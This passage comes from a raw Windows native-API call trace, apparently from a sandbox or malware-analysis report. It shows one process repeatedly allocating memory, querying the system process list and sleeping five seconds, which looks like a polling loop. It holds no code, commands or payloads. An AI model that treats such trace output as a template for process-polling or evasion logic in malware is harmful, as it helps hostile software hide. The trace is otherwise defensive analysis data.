returned 0x0 [0249.753] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.754] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.755] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.755] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.756] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.756] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.756] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.760] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.760] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.763] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.768] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.769] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.770] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.771] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.771] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.775] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.776] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.784] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.785] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.787] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.791] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.791] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.794] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.794] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.798] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.799] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.800] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.801] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.805] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.807] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.812] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.812] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.815] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.820] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.822] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.824] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.831] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.833] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.839] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.840] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.842] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.843] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.843] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.850] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.853] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.859] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.860] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.863] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.864] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.870] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.871] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.880] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.881] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.883] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.884] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.884] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.889] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.890] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.892] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.892] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.893] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.894] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.899] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.900] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.902] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.902] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.903] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.903] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.903] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.909] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.911] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.911] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.912] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.918] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.919] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.920] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.921] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.927] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.929] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, 